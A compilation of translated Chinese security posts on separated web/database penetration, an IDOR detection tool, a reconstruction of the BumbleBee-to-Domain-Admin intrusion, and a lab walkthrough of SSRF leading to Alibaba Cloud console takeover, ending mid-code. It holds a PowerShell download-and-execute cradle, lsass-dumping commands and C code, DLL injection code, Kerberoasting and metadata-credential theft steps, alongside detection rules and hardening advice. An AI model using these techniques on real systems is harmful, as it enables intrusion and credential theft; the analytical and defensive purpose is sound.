Fill in the public network address (the cloud function's domain name) in the listener's HTTP Hosts and the stager's Hosts. Be careful not to include the http:// prefix or the :80 port. Add the listener. After generating the payload, the beacon checked in successfully. Original text link: https://blog.bbskali.cn/3771.html
-
Title: Summary of ideas and techniques for penetrating sites with separated web and database servers
Preface
I saw a discussion about sites whose web server and database are separated, and I would like to summarize some tips for information collection on them.

Text
There is no summary article yet on sites of this type, so I want to record penetration ideas for sites with separated web and database servers. For such a site there are usually two entry points: 1. the web site; 2. the database. The ideas are fairly conventional; the two entry points are simply two paths: from the web site into the database and then the intranet, or from the database into the web site and then the intranet, with the test plan tailored to whichever path is available. The following records the process and common problems.

1. Infiltration from the web entrance
From the web entrance you usually get a shell through the site's vulnerabilities, such as file upload, command execution, code execution, or writing files through SQL injection (into outfile, log backup, etc.). Once web permissions are obtained, or when there is a vulnerability such as file reading, we also read the database configuration file, analyze the database content, look for database backups, and then move on to the database server's IP for subsequent operations.

2. Infiltration from the database entrance
Here the database entry points are: a weak password exposed on the external network; or SQL injection in the web site. Penetration from the database entrance is also mainly about obtaining greater permissions or expanding our results. For example, password information, usernames and so on can be obtained from the database, which helps greatly with subsequent intranet penetration.
When the site and database are separated, the database and the web application are not on the same server. In that case you cannot write a one-line webshell through the database and connect to it via the web, because the path is useless. If the entry point is SQL injection found on the web side, information can be collected and permissions obtained through the following methods.

1. MySQL

(1) Locate the web server's IP address
You can check the current connections to MySQL by querying PROCESSLIST in the information_schema database. Because the web application issues queries to the database, the web server's ip:port is returned in the host column:

    select * from information_schema.PROCESSLIST;

After obtaining the IP of the web server, we can penetrate the web side.

(2) load_file() to obtain sensitive information about the server hosting the database
If the secure_file_priv parameter imposes no restriction (versions below MySQL 5.7), we can also use the load_file() function to read file contents:

    select load_file('C:/test.txt');   # a forward slash / also works

Network card information can be obtained the same way, for example by reading:

    /etc/udev/rules.d/70-persistent-net.rules         # network card name
    /etc/sysconfig/network-scripts/ifcfg-<card name>  # static IP / DHCP
    /var/lib/dhclient/dhclient--<card name>.lease     # DHCP lease

2. MSSQL

(1) Determine whether the site and database are separated
Get the client host name:

    select host_name();

Get the server host name:

    select @@servername;

Compare the results: if they are the same, the web and database are probably on the same server; if they differ, the site and database are separated.

(2) Execute commands through stored procedures
We can execute system commands through MSSQL stored procedures, try to escalate privileges directly, and penetrate other hosts. Two commonly used ones are xp_cmdshell and sp_OACreate. They can also be used to detect whether the database server has outbound network access, by executing ping or curl.
Usually when we encounter MSSQL, we get a beacon directly through command execution. It is also a database, so naturally it holds some sensitive information; to penetrate further, you can compile a password list or other information from it.
-
Title: SaaS-API overprivileged vulnerability detection system
Overview
By replacing the authentication information in a request and comparing the responses, the tool determines whether an interface has a broken-access-control (IDOR / privilege-escalation) vulnerability.

Features
Supports HTTPS; automatically filters static content such as images, JS, CSS and HTML pages; avoids getting blocked; outputs a report with the complete URL, request and response.

Installation and use
Install dependencies:

    git clone https://github.com/y1nglamore/IDOR_detect_tool.git
    python3 -m pip install -r requirements.txt

Start:

    python3 start.py

It then listens on socks5://127.0.0.1:8889.

Install the certificate
Use a plug-in such as SwitchyOmega to route the browser through the proxy, visit mitm.it to reach the certificate installation page, and install the certificate for your operating system. Taking macOS as an example: after downloading and installing, open Keychain Access, find the mitmproxy certificate and set it to Always Trust.

Detecting vulnerabilities
First prepare two accounts, A and B, on the target system. Configure account A's credentials in config/config.yml according to the system's authentication logic (cookie, header, parameters, etc.), then log in with account B. Browse with account B; the script automatically replaces the authentication information with A's, replays the request, and decides from the response whether there is a broken-access-control vulnerability.

Generate a report
Each newly found vulnerability is automatically added to report/result.html, which can be opened in a browser. Click a specific entry to expand or collapse the corresponding request and response.

Detection logic
Original link: https://github.com/y1nglamore/IDOR_detect_tool
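The replace-and-replay comparison described above, as an added example that is not part of the IDOR_detect_tool project: a constructed in-memory target (app, SESSIONS, ORDERS, the sid= cookie scheme and the /api/orders paths are all assumptions) stands in for the proxied site, and check_request swaps in account A's credentials, replays, and compares the two responses.

```python
import re
from dataclasses import dataclass
from difflib import SequenceMatcher
from urllib.parse import urlparse

# Static resources the post says the tool skips (images, JS, CSS, HTML pages).
STATIC_EXT = re.compile(r"\.(png|jpe?g|gif|svg|ico|css|js|html?|woff2?)$", re.I)

# Constructed target: two accounts (A = alice, B = bob), each owning one order.
SESSIONS = {"sess_A": "alice", "sess_B": "bob"}
ORDERS = {
    "1001": {"owner": "alice", "total": 42},
    "1002": {"owner": "bob", "total": 7},
}


def app(method, url, headers):
    """Constructed stand-in for the target system (no network involved).
    /api/orders/<id> is vulnerable: it never checks who owns the order.
    /api/v2/orders/<id> is the fixed version. Returns (status, body)."""
    cookie = headers.get("Cookie", "")
    user = SESSIONS.get(cookie.replace("sid=", "", 1))
    if user is None:
        return 401, "unauthenticated"
    m = re.match(r"/api/(v2/)?orders/(\d+)$", urlparse(url).path)
    if not m:
        return 404, "not found"
    order = ORDERS.get(m.group(2))
    if order is None:
        return 404, "not found"
    if m.group(1) and order["owner"] != user:  # ownership check only in v2
        return 403, "forbidden"
    return 200, f'{{"id":{m.group(2)},"owner":"{order["owner"]}","total":{order["total"]}}}'


# Account A's credentials, as config/config.yml would hold them (constructed).
ACCOUNT_A = {"Cookie": "sid=sess_A"}


@dataclass
class Finding:
    url: str
    status_b: int      # what account B saw while browsing
    status_a: int      # what the replay with A's credentials returned
    similarity: float  # body similarity between the two responses


def is_static(url):
    return bool(STATIC_EXT.search(urlparse(url).path))


def check_request(method, url, headers_b, send=app, threshold=0.9):
    """Core detection step: take a request captured from account B, swap in
    account A's authentication, replay it, and compare the two responses.
    A 200 with a near-identical body means A can read B's resource."""
    if is_static(url):
        return None
    status_b, body_b = send(method, url, headers_b)
    if status_b != 200:
        return None  # B itself could not reach it; nothing to compare
    headers_a = dict(headers_b)
    headers_a.update(ACCOUNT_A)  # replace B's auth material with A's
    status_a, body_a = send(method, url, headers_a)
    similarity = SequenceMatcher(None, body_a, body_b).ratio()
    if status_a == 200 and similarity >= threshold:
        return Finding(url, status_b, status_a, round(similarity, 3))
    return None


def render_report(findings):
    """Minimal HTML report in the spirit of report/result.html."""
    rows = "".join(
        f"<li><b>{f.url}</b> B={f.status_b} A={f.status_a} sim={f.similarity}</li>"
        for f in findings
    )
    return f"<html><body><h1>IDOR findings</h1><ul>{rows}</ul></body></html>"


if __name__ == "__main__":
    # Requests as account B would issue them while browsing (constructed).
    B = {"Cookie": "sid=sess_B"}
    hits = [h for h in (
        check_request("GET", "http://target/api/orders/1002", B),
        check_request("GET", "http://target/api/v2/orders/1002", B),
        check_request("GET", "http://target/static/app.js", B),
    ) if h]
    print(render_report(hits))
```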
-
Title: Practical Restoration: From a Bumblebee Sample to Domain Admin, a Technical Analysis
0 Introduction: restoring the practical case
The article "BumbleBee Roasts Its Way To Domain Admin" describes a penetration case in detail, but it is organised around the ATT&CK framework rather than along the timeline, which makes it hard for penetration testers to follow what happened before and after each step. Here we sort it out and restore the real-world sequence according to the timeline. "BumbleBee Roasts Its Way To Domain Admin": original link

1 Day 1
1.1 Sample delivery
It appears that a machine in the target environment received the sample via a download link in an e-mail. The sample is an archive without a password. After decompression it drops the file BC_invoice_Report_CORP_46.iso. Mounting this ISO exposes an LNK file, documents.lnk; double-clicking this shortcut runs a hidden malicious loader. The shortcut's target is as follows:

    C:\Windows\System32\cmd.exe /c start rundll32 namr.dll,ItalJob

1.1.1 rundll32 analysis
Using rundll32 to load and execute is a common penetration routine. It can run code in a DLL, and it is also commonly used to obtain shells:

    use exploit/windows/smb/smb_delivery
    set srvhost 10.x.x.x
    exploit

1.2 Loading the malicious program BumbleBee
The BumbleBee loader returns a Cobalt Strike session. The attacker uses this Cobalt Strike shell to drop wab.exe. The executable is launched through WMI:

    C:\Windows\System32\wbem\wmiprvse.exe -secured -Embedding

wab.exe injects malicious code into two other processes, explorer.exe and rundll32.exe. According to the original text, remote thread injection and process injection are performed using the classic Windows API calls OpenProcess, VirtualAlloc, WriteProcessMemory and CreateRemoteThread. From these descriptions, the attacker now has at least Administrator permissions.
Generally, an Administrator can obtain SYSTEM privileges. Judging from the article, the attacker used getsystem to escalate. Example code for remote thread injection:

    BOOL CreateRemoteThreadInjectDLL(DWORD dwProcessId, char* pszDllFileName)
    {
        HANDLE hProcess = NULL;
        DWORD dwSize = 0;
        LPVOID pDllAddr = NULL;
        FARPROC pFuncProcAddr = NULL;
        hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);          // open the process and get a handle
        dwSize = 1 + ::lstrlen(pszDllFileName);                                    // length of the DLL path
        pDllAddr = ::VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); // allocate memory in the target
        ::WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL);    // write the DLL path into it
        pFuncProcAddr = ::GetProcAddress(::GetModuleHandle("kernel32.dll"), "LoadLibraryA"); // address of LoadLibraryA
        HANDLE hRemoteThread = ::CreateRemoteThread(hProcess, NULL, 0,
            (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, NULL);             // create the remote thread
        ::CloseHandle(hProcess);
        return TRUE;
    }

1.3 Host information collection
Attackers use a variety of commands to collect information about the operating system, network, users, software, processes, domain, etc.
    ipconfig /all                           # network information, including the domain
    ping -n 1 [domain]                      # test domain connectivity
    net group "domain admins" /domain       # members of the Domain Admins group
    nslookup x.x.x.x                        # resolve an IP address
    tasklist                                # process information
    systeminfo                              # system information
    wmic product get name,version           # installed software
    wmic /node:redacted process list brief  # process list of a remote host
    net view \\redacted\Files$ /all         # list the remote server's Files share
    dir \\redacted\c$\                      # list the remote C: drive
    tasklist /v /s x.x.x.x                  # remote process details
    net use
    net group "Domain computers" /domain
    net group "Enterprise admins" /domain
    net group "domain computers" /domain
    net localgroup administrators
    nltest /dclist
    nltest /domain_trusts
    ping -n 1 remote_ip

Judging from the commands above, the attacker had obtained access to, or a username and password for, the remote server x.x.x.x.

1.4 Lateral movement to a server and further collection
The original describes using the local admin account to move laterally to a server via RDP, dropping AnyDesk.exe as a backdoor, and then using adfind.exe (run as af.exe) to keep collecting information (from the description, the server appears to be domain-joined):

    cmd.exe /C af.exe -f "(objectcategory=person)" > ad_users.txt
    cmd.exe /C af.exe -f "objectcategory=computer" > ad_computers.txt
    cmd.exe /C af.exe -sc trustdump > trustdump.txt
    cmd.exe /C af.exe -gcb -sc trustdump > trustdump.txt

2 Day 2
2.1 Continued collection on the server
The attacker kept logging in to the server over RDP and uploaded VulnRecon, a tool designed specifically to identify privilege-escalation paths on Windows machines.
3 Day 4
3.1 Continued collection on compromised hosts
The attacker uploaded VulnRecon and the Sysinternals toolkit to multiple machines, the originally compromised host and others in the environment, and continued to collect information with VulnRecon, adfind, procdump and other tools. Among other things, they used remote services to run procdump and extract the memory of lsass.exe for credentials; from the description they now held access to at least several hosts and at least one server. So far there seems to be no access to administrative or higher permissions. The adfind activity took place on the originally compromised host, though the newly reached hosts cannot be ruled out:

    cmd.exe /C adfind.exe -f "(objectcategory=person)" > ad_users.txt
    cmd.exe /C adfind.exe -f "objectcategory=computer" > ad_computers.txt
    cmd.exe /C adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt
    cmd.exe /C adfind.exe -sc trustdump > trustdump.txt

3.1.1 VulnRecon analysis
VulnRecon consists of an executable and a DLL, vulnrecon.exe and vulnrecon.dll, used to enumerate privilege-escalation methods and collect information. It appears to be a custom tool, uploaded to the originally compromised host (and possibly to the newly reached hosts as well).

    # vulnrecon.dll PDB: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\standalone\Release\apphost.pdb
    # vulnrecon.exe PDB: D:\work\rt\VulnRecon\VulnRecon\obj\Release\net5.0\VulnRecon.pdb
    # commands
    vulnrecon.exe -v
    vulnrecon.exe -o
    vulnrecon.exe -FindVulnerability
    vulnrecon.exe -i
    vulnrecon.exe -m
    cmd.exe /c vulnrecon.exe -FindVulnerability > c:\programdata\log.txt
    cmd.exe /c vulnrecon.exe -i > c:\programdata\1.txt
    cmd.exe /c vulnrecon.exe -o > c:\programdata\out.txt

The privilege escalation appears to consist of running procdump to obtain lsass memory, which took place on the originally compromised host.

3.2 Obtaining credentials from lsass
According to the description the dumped file is saved under ProgramData; it can be retrieved with net use or similar and cracked with mimikatz or pypykatz. These steps took place on the victim hosts and servers discovered from the originally compromised host and reached by lateral movement.

    C:\programdata\procdump64.exe -accepteula -ma lsass.exe C:\ProgramData\lsass.dmp

4 Day 7
4.1 Continued collection on the compromised server
The attacker continued to use VulnRecon on the server and also used Seatbelt (a commonly used information collection tool). According to the description, the server's local administrator privileges were used.

    Seatbelt.exe -group=all -outputfile="C:\ProgramData\seatinfo.txt"
    vulnrecon.exe -o
    vulnrecon.exe -v
    vulnrecon.exe -m
    cmd.exe /c vulnrecon.exe -FindVulnerability > c:\programdata\log.txt

5 Day 11
5.1 Reverse shell on the compromised host
The attacker repeatedly executed PowerShell on the compromised host, downloading and executing the contents of a file:

    C:\Windows\system32\cmd.exe /C powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://a.b.c.d:80/a'))"

Based on the Cobalt Strike default-configuration marker MZRE found in a, this can be identified as a stager connecting to the C2 address. The attacker thereby connects the compromised host to attacker-controlled C2, and then starts injecting into other processes; according to the original, several processes such as svchost.exe were injected. The attacker then executed the PowerShell module Invoke-Kerberoast and began a Kerberoasting attack, again from the compromised host.
    # Parent process
    svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

    IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:36177/'); Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath C:\ProgramData\REDACTED\ps.txt -append -force -Encoding UTF8
    # The output is in hashcat format, so the hashes were presumably brute-forced with hashcat

5.1.1 Kerberoasting attack analysis
Kerberoasting comes in two forms: TGS-Kerberoasting and AS-Kerberoasting. It can be performed with Rubeus.exe, msf or PowerShell. What it obtains, a Net-NTLM hash, can be cracked with hashcat and other tools to obtain the NTLM hash or the password.

5.2 Credential extraction with MiniDump
The attacker began to use MiniDump, a credential extraction method that can evade Kaspersky, again from the compromised host.

    # Parent process
    svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
    cmd.exe /C rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 968 C:\ProgramData\REDACTED\lsass.dmp full

5.2.1 MiniDump analysis

    #include <stdio.h>
    #include <Windows.h>
    #include <tlhelp32.h>

    typedef HRESULT(WINAPI* _MiniDumpW)(DWORD arg1, DWORD arg2, PWCHAR cmdline);

    int GetLsassPid()
    {
        PROCESSENTRY32 entry;
        entry.dwSize = sizeof(PROCESSENTRY32);
        HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
        if (Process32First(hSnapshot, &entry)) {
            while (Process32Next(hSnapshot, &entry)) {
                if (wcscmp(entry.szExeFile, L"lsass.exe") == 0) {
                    return entry.th32ProcessID;
                }
            }
        }
        CloseHandle(hSnapshot);
        return 0;
    }

    void GetDebugPrivilege()
    {
        BOOL fOk = FALSE;
        HANDLE hToken;
        if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
            TOKEN_PRIVILEGES tp;
            tp.PrivilegeCount = 1;
            LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
            tp.Privileges[0].Attributes = true ? SE_PRIVILEGE_ENABLED : 0;
            AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
            fOk = (GetLastError() == ERROR_SUCCESS);
            CloseHandle(hToken);
        }
    }

    void DumpLsass()
    {
        wchar_t ws[100];
        _MiniDumpW MiniDumpW;
        MiniDumpW = (_MiniDumpW)GetProcAddress(LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
        swprintf(ws, 100, L"%u %hs", GetLsassPid(), "c:\\windows\\temp\\temp.bin full");
        GetDebugPrivilege();
        MiniDumpW(0, 0, ws);
    }

    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
    {
        switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            DumpLsass();
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }

I compiled this file myself; thanks here to the former A-Team for their vision of penetration techniques and to XPN abroad for sharing. See the reference for compilation and usage.

5.3 Continued collection on the compromised host
adfind continued to be used on the originally compromised host:

    cmd.exe /C adfind.exe -f "(objectcategory=person)" > ad_users.txt
    cmd.exe /C adfind.exe -f "objectcategory=computer" > ad_computers.txt
    cmd.exe /C adfind.exe -sc trustdump > trustdump.txt

5.4 PowerShell executed again on the originally compromised machine, same as before
The attacker repeatedly executed PowerShell on the compromised host, downloading and executing the contents of a file:

    C:\Windows\system32\cmd.exe /C powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://a.b.c.d:80/a'))"

The process above is described in detail in 5.1 and will not be repeated.
5.5 Information collection on more machines
The following commands were executed on more machines:

    C:\Windows\system32\cmd.exe /C net accounts /domain
    C:\Windows\system32\cmd.exe /C net view /all
    C:\Windows\system32\cmd.exe /C whoami
    C:\Windows\system32\cmd.exe /C net view \\x.x.x.x\ /all
    C:\Windows\system32\cmd.exe /C wmic /node:x.x.x.x process list brief
    C:\Windows\system32\cmd.exe /C net group "domain controllers" /domain
    C:\Windows\system32\cmd.exe /C net nltest /dclist:[domain]

5.6 Two batch scripts
The attacker uploaded and ran two scripts, s.bat and w.bat, which resolve and discover other targets in the environment:

    # s.bat
    @echo off
    for /f %%i in (servers.txt) do for /f "tokens=2 delims=[]" %%j in ('ping -n 1 -4 "%%i"') do @echo %%j >> serv.log

    # w.bat
    @echo off
    for /f %%i in (workers.txt) do for /f "tokens=2 delims=[]" %%j in ('ping -n 1 -4 "%%i"') do @echo %%j >> work.log

5.7 Finally
After the two scripts were run, a new Cobalt Strike session was started once more on the originally compromised machine. The attacker then used a service account to move laterally and run a Cobalt Strike session on the domain controller. According to the original description, this was a weak password, obtained by cracking with hashcat the Net-NTLM hash captured through TGS-Kerberoasting. The attacker dumped the process memory of lsass.exe on the domain controller, obtaining domain admin credentials and compromising the domain controller. Original source: https://www.cnblogs.com/KevinGeorge/p/16595912.html
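From the defender's side, the command lines quoted throughout this timeline are the detection surface. As an added example (not from the article or any vendor product), the rules below mirror those command lines and run over constructed process-creation log lines; the log format, host names and rule names are assumptions.

```python
import re
from collections import namedtuple

Rule = namedtuple("Rule", "name pattern")

# One rule per command line quoted in the timeline above. The patterns are
# constructed for this example, not vendor signatures.
RULES = [
    Rule("lnk_rundll32_from_cmd",
         re.compile(r"cmd\.exe\s+/c\s+start\s+rundll32\s+\S+\.dll,\w+", re.I)),
    Rule("procdump_lsass",
         re.compile(r"procdump(64)?\.exe.*-ma\s+lsass\.exe", re.I)),
    Rule("comsvcs_minidump",
         re.compile(r"rundll32\.exe.*comsvcs\.dll,\s*MiniDump\s+\d+", re.I)),
    Rule("powershell_iex_download",
         re.compile(r"powershell\.exe.*-nop.*-w\s+hidden.*IEX.*downloadstring", re.I)),
    Rule("invoke_kerberoast", re.compile(r"Invoke-Kerberoast", re.I)),
    Rule("adfind_trustdump", re.compile(r"\b(adfind|af)\.exe.*-sc\s+trustdump", re.I)),
    Rule("seatbelt_all", re.compile(r"Seatbelt\.exe.*-group=all", re.I)),
]

# Constructed process-creation records: "<ts> key=value ... cmd=<command line>".
# Command lines are the ones quoted in the timeline; hosts and parents are made up.
SAMPLE_LOGS = r"""
2022-03-01T09:00:01Z host=WS01 parent=explorer.exe image=cmd.exe cmd=C:\Windows\System32\cmd.exe /c start rundll32 namr.dll,ItalJob
2022-03-04T11:22:40Z host=WS01 parent=cmd.exe image=af.exe cmd=cmd.exe /C af.exe -sc trustdump > trustdump.txt
2022-03-04T15:05:13Z host=SRV02 parent=cmd.exe image=procdump64.exe cmd=C:\programdata\procdump64.exe -accepteula -ma lsass.exe C:\ProgramData\lsass.dmp
2022-03-07T08:30:00Z host=SRV02 parent=cmd.exe image=Seatbelt.exe cmd=Seatbelt.exe -group=all -outputfile="C:\ProgramData\seatinfo.txt"
2022-03-11T10:12:55Z host=WS01 parent=cmd.exe image=powershell.exe cmd=C:\Windows\system32\cmd.exe /C powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://a.b.c.d:80/a'))"
2022-03-11T10:13:30Z host=WS01 parent=svchost.exe image=powershell.exe cmd=IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:36177/'); Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath C:\ProgramData\REDACTED\ps.txt -append -force -Encoding UTF8
2022-03-11T10:14:02Z host=WS01 parent=svchost.exe image=cmd.exe cmd=cmd.exe /C rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 968 C:\ProgramData\REDACTED\lsass.dmp full
2022-03-11T10:20:00Z host=WS02 parent=explorer.exe image=powershell.exe cmd=powershell.exe -File C:\scripts\backup.ps1
2022-03-11T10:21:00Z host=WS02 parent=explorer.exe image=rundll32.exe cmd=rundll32.exe shell32.dll,Control_RunDLL
"""


def parse_event(line):
    """Parse one record into a dict; the command line is everything after 'cmd='."""
    head, sep, cmd = line.partition(" cmd=")
    if not sep:
        return None
    parts = head.split()
    fields = dict(kv.split("=", 1) for kv in parts[1:] if "=" in kv)
    fields["ts"] = parts[0]
    fields["cmd"] = cmd
    return fields


def scan_logs(text):
    """Return (rule, host, parent, command line) for every matching record."""
    hits = []
    for raw in text.splitlines():
        ev = parse_event(raw.strip())
        if not ev:
            continue
        for rule in RULES:
            if rule.pattern.search(ev["cmd"]):
                hits.append((rule.name, ev.get("host", "?"), ev.get("parent", "?"), ev["cmd"]))
    return hits


def hosts_with_credential_access(hits):
    """Hosts where an lsass dump technique fired; these are the ones the
    timeline shows being used to reach the domain controller."""
    return sorted({h for name, h, _, _ in hits if name in ("procdump_lsass", "comsvcs_minidump")})


if __name__ == "__main__":
    for name, host, parent, cmd in scan_logs(SAMPLE_LOGS):
        print(f"{name:26} {host:6} parent={parent:14} {cmd[:70]}")
    print("credential access on:", hosts_with_credential_access(scan_logs(SAMPLE_LOGS)))
```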
-
Title: From a Cloud Server SSRF Vulnerability to Taking Over Your Alibaba Cloud Console
0x00 Introduction
This article uses Alibaba Cloud as an example to demonstrate some offensive and defensive techniques in cloud services. First, Terraform is used to build an ECS instance with an SSRF vulnerability; then, step by step, the SSRF vulnerability in the instance is used to obtain all Alibaba Cloud permissions of the cloud account.

0x01 Environment construction
This article uses TerraformGoat to build the range. TerraformGoat address: https://github.com/HuoCorp/TerraformGoat

Deploying the range requires your Alibaba Cloud AccessKey. To avoid affecting your cloud production environment, it is strongly recommended to use an AccessKey from a non-production environment and not the same account as production.

Because of ongoing updates to TerraformGoat, the environment construction method below no longer works; the current deployment method is more convenient. For the specific deployment method, please refer to the TerraformGoat address above.

Next, build the range: first clone the project locally and build the dependencies it needs.

    git clone https://github.com/HuoCorp/TerraformGoat.git --depth 1
    cd TerraformGoat
    docker build . -t terraformgoat:v0.0.3
    docker run -itd --name terraformgoat terraformgoat:v0.0.3
    docker exec -it terraformgoat /bin/bash

If GitHub access is slow, you can set a proxy for the terminal:

    proxy_url='127.0.0.1:1080'
    export https_proxy=http://$proxy_url http_proxy=http://$proxy_url all_proxy=socks5://$proxy_url

After entering the container, it prompts you to select the cloud provider to use next. Taking Alibaba Cloud as the example, enter 2 to select Alibaba Cloud and press Enter.
Enter the Alibaba Cloud ECS SSRF range directory and configure your AccessKey:

    cd /TerraformGoat/aliyun/ecs/ecs_ssrf/
    aliyun configure

Deploy the SSRF range:

    terraform init
    terraform apply

If init is slow, just set the proxy. During apply you will be prompted "Enter a value"; enter yes. Under Outputs you can see the returned range address. Visiting this address shows the SSRF test range page, which means the environment has been built.

0x02 Exploiting the environment
There is an SSRF vulnerability in the current environment, but unlike a regular SSRF, the vulnerable host is a cloud server, which means the SSRF can be used to obtain the server's instance metadata. Access the metadata:

    http://100.100.100.200/latest/meta-data

The returned result shows a ram/ directory, which means the cloud server has a RAM role configured, so we can obtain temporary credentials.

Obtain temporary credentials through the metadata. huocorp-terraform-goat-role in the URL below is the RAM role name, which can be found by visiting http://100.100.100.200/latest/meta-data/ram/security-credentials/.

    http://100.100.100.200/latest/meta-data/ram/security-credentials/huocorp-terraform-goat-role

Configure the temporary credentials in the aliyun command line tool:

    aliyun configure --mode StsToken

Create a sub-user and grant administrator permissions:

    aliyun ram CreateUser --UserName teamssix
    aliyun ram CreateLoginProfile --UserName teamssix --Password TeamsSix@666
    aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName teamssix

Visit https://signin.aliyun.com and log in as a RAM user. The user format is username@company-alias, where username is the user just created; company-alias can be obtained with the following command.
    aliyun ram GetAccountAlias

The AccountAlias here is the company-alias we need; next you can log in to the console, entering the password set when the user was created. After logging in you can see the target console. Since AdministratorAccess was granted when the user was created, the RAM access control page shows that the current account has permission to manage all Alibaba Cloud resources. Under ECS instances you can also see the SSRF range server just built. At this point, taking over the Alibaba Cloud console via the SSRF vulnerability on the cloud server has been achieved. In addition, a flag file is placed in this environment; if you are interested, try to find it. Writeup: https://github.com/HuoCorp/TerraformGoat/tree/main/aliyun/ecs/ecs_ssrf

0x03 Defensive measures
Besides SSRF, there are two other major problems in this environment:
1. The RAM role has excessive permissions, which allows operations such as creating sub-users with the role's permissions and granting them high privileges.
2. Metadata access is not hardened, so once the target has an SSRF or the instance is compromised, the metadata is at risk of being obtained.

For the first problem, excessive RAM role permissions, the main remedy is strict adherence to the principle of least privilege: when granting permissions to a RAM role, avoid overly high permissions and grant only what is needed. This minimises the impact but does not cure the root cause. For the second problem, unhardened metadata access, the instance's metadata access mode can be set to hardened mode; this is the fundamental solution.
There are two ways to set the metadata access mode to hardened mode:
1. When creating an instance, set "Instance Metadata Access Mode" to hardened mode only under Advanced Options of System Configuration.
2. For an existing instance, enable forced token-based metadata access through the Alibaba Cloud OpenAPI: https://next.api.aliyun.com/api/Ecs/2014-05-26/ModifyInstanceMetadataOptions

Setting HttpTokens to required enforces hardened mode; accessing the metadata then returns 403.

It is worth mentioning that hardened mode prevents the metadata from being obtained through SSRF, but if the instance itself is compromised, a red team can still run commands on the instance to get a token and then use the token to read the metadata. On a Linux instance the token is obtained as follows:

    TOKEN=`curl -X PUT "http://100.100.100.200/latest/api/token" -H "X-aliyun-ecs-metadata-token-ttl-seconds: 21600"`

Reading the metadata with the token:

    curl -H "X-aliyun-ecs-metadata-token: $TOKEN" http://100.100.100.200/latest/meta-data/

For Windows instances, refer to Alibaba Cloud's official documentation: https://help.aliyun.com/document_detail/108460.htm

This defence against SSRF by setting the metadata access mode to hardened mode was contributed by 2h0ng.

0x04 Environment deletion
Delete the created sub-account:

    aliyun ram DetachPolicyFromUser --PolicyType System --PolicyName AdministratorAccess --UserName teamssix
    aliyun ram DeleteUser --UserName teamssix

Then delete the SSRF range environment. After using the range, remember to delete it in time, because the cloud resources created here are billed by time; this range instance costs RMB 0.17 per hour.
Before destroying the range, remember to switch the configured AccessKey back to the original AccessKey:

    aliyun configure --mode AK
    terraform destroy

If you want to remove TerraformGoat entirely, use the following commands. If you plan to keep studying cloud offence and defence, you can keep the TerraformGoat environment.

    docker stop terraformgoat
    docker rm terraformgoat
    docker rmi terraformgoat:v0.0.3

0x05 Summary
Here, a temporary key was obtained through an SSRF vulnerability on a cloud server, a sub-user with AdministratorAccess was created with the temporary key, and finally the target console was taken over through this sub-user. However, using this method in practice has some prerequisites, mainly the following two:
1. The ECS instance must have a RAM role attached; otherwise accessing the temporary credentials in the metadata returns 404.
2. The RAM role must have the relevant RAM access-control permissions, such as creating users and granting permissions; otherwise the temporary key cannot create sub-users.

In practice, even when an ECS instance is granted a RAM role, most of the time the role does not have user-creation permission. In that case it is impossible to log in to the console by creating a sub-account, and the target cloud services can only be operated through the Alibaba Cloud command line tool.

In general, cloud offence and defence differ greatly from conventional intranet offence and defence. A common problem in the cloud is misconfiguration; the problem here, for example, is that the RAM role was granted excessive permissions. The main way to maintain access in the cloud is to create high-privileged RAM users, rather than the variety of persistence methods used in traditional offence and defence.
Lateral movement in the cloud happens mainly within the cloud provider's command line or console, from one cloud service to another, rather than through the various intranet lateral-movement methods of traditional offence and defence.

Finally, many of the commands mentioned in this article are taken from the Huoxian (Fireline) Cloud Security Knowledge Base: https://cloudsec.huoxian.cn. The homepage of the knowledge base shows the Huoxian Cloud Service Attack and Defense Matrix, and this article is a cloud attack-and-defence exercise based on that matrix. If you want more cloud security resources, visit the Awesome Cloud Security project, which currently collects more than a hundred domestic and foreign cloud security blogs, tools, official accounts and other resources: https://github.com/teamssix/awesome-cloud-security

Reference article: https://cloudsec.huoxian.cn/docs/articles/aliyun/aliyun_ecs
Original link: https://wiki.teamssix.com/CloudService/EC2/aliyun-console-takeover.html
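The two defensive points of 0x03 and the two prerequisites of 0x05, as an added example that is not from TerraformGoat or Alibaba Cloud: an in-memory stand-in for the 100.100.100.200 metadata service shows why HttpTokens=required (hardened mode) stops a plain-GET SSRF while a PUT from inside the instance still works, and a policy check flags a RAM role that can create and empower a sub-user. The paths and header names are the ones quoted in the post; the MetadataService class, the policy documents and the audit names are constructed.

```python
import json
import secrets

TOKEN_HDR = "X-aliyun-ecs-metadata-token"
TTL_HDR = "X-aliyun-ecs-metadata-token-ttl-seconds"
CREDS_PATH = "/latest/meta-data/ram/security-credentials/"

# Constructed metadata tree: the role name listed under ram/security-credentials/.
META_PATHS = {CREDS_PATH: "huocorp-terraform-goat-role"}


class MetadataService:
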